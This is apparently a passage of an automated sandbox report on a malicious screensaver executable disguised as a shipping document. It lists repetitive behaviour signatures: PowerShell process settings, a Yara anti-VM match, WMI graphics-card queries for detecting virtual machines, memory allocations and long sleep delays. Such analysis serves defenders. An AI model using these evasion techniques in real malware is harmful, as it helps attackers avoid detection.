Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process information set: NOOPENFILEERRORBOX

Malware Analysis System Evasion

Yara detected AntiVM3

Source: Yara match

File source: Process Memory Space: PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe PID: 1988, type: MEMORYSTR

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_VideoController

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Memory allocated: 14F0000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Memory allocated: 3390000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Memory allocated: 1510000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Memory allocated: 9940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Memory allocated: A940000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Memory allocated: AB60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Memory allocated: BB60000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Memory allocated: C310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Memory allocated: D310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Memory allocated: E310000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Memory allocated: 2900000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Memory allocated: 2A80000 memory reserve \| memory write watch	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Memory allocated: 4A80000 memory reserve \| memory write watch	Jump to behavior

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Window / User API: threadDelayed 2786	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	Window / User API: threadDelayed 7051	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7960	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1582	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7625	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1985	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 7597	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 2044	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 8153
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Window / User API: threadDelayed 1367

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe TID: 4952	Thread sleep time: -922337203685477s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe TID: 4668	Thread sleep time: -19369081277395017s >= -30000s	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe TID: 6164	Thread sleep count: 2786 > 30	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe TID: 6164	Thread sleep count: 7051 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6172	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4952	Thread sleep count: 7625 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4952	Thread sleep count: 1985 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3500	Thread sleep time: -6456360425798339s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 4068	Thread sleep count: 7597 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 3276	Thread sleep count: 2044 > 30	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 6448	Thread sleep time: -2767011611056431s >= -30000s	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 432	Thread sleep time: -2767011611056431s >= -30000s
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 320	Thread sleep time: -922337203685477s >= -30000s

Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\PACKIING-#U5ee3#U5dde#U7acb#U5f97 - EVER ATOP V.1319-008W KHH-RTM SO A268.scr.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
